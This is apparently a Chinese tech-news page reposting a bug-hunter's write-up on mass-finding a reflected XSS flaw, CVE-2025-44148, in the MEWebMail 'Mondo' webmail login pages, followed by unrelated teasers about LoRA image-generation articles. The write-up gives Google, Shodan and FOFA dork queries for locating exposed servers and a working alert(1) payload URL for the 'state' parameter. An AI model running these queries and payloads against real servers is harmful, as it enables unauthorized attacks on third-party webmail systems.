news 2026/5/5 20:56:58

XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

XSS大规模挖掘:CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者:Abhirup Konwar
2025年8月24日

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

(按回车或点击查看完整尺寸图片)

2️⃣ Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析:

  • Domain
  • ssl.cert.subject.cn

(按回车或点击查看完整尺寸图片)

3️⃣ FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

(按回车或点击查看完整尺寸图片)
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/25 11:32:13

体育赛事宣传创新:训练球队专属风格的应援物设计生成器

体育赛事宣传创新:训练球队专属风格的应援物设计生成器 在职业体育日益激烈的注意力竞争中,一支球队的品牌识别早已不再局限于球衣和队徽。从社交媒体上的动态海报,到球迷看台的横幅设计,再到周边商品的视觉呈现——每一次曝光都…

作者头像 李华
网站建设 2026/5/3 17:07:45

交通安全法规普及:生成交通事故模拟图加强警示教育

交通安全法规普及:生成交通事故模拟图加强警示教育 在城市交通日益复杂的今天,每年因酒驾、闯红灯、分心驾驶等违法行为引发的交通事故仍居高不下。尽管交管部门持续开展宣传教育,但传统的警示手段——如播放真实事故视频或张贴静态示意图——…

作者头像 李华
网站建设 2026/4/28 0:59:19

网盘直链下载助手提取lora-scripts大型模型权重文件教程

网盘直链下载助手提取lora-scripts大型模型权重文件教程 在生成式AI的浪潮中,越来越多创作者和开发者希望快速获得定制化模型能力——比如让Stable Diffusion画出特定画风,或让大语言模型掌握某种专业术语。LoRA(Low-Rank Adaptation&#xf…

作者头像 李华
网站建设 2026/4/26 2:16:12

lora-scripts与LoRA技术结合推动边缘计算落地

LoRA与自动化工具的协同演进:重塑边缘AI开发范式 在大模型席卷各行各业的今天,一个现实问题日益凸显:如何让动辄数十GB的庞然大物落地到算力有限的终端设备上?当企业需要为客服系统定制专属话术风格、设计师希望训练个人艺术签名式…

作者头像 李华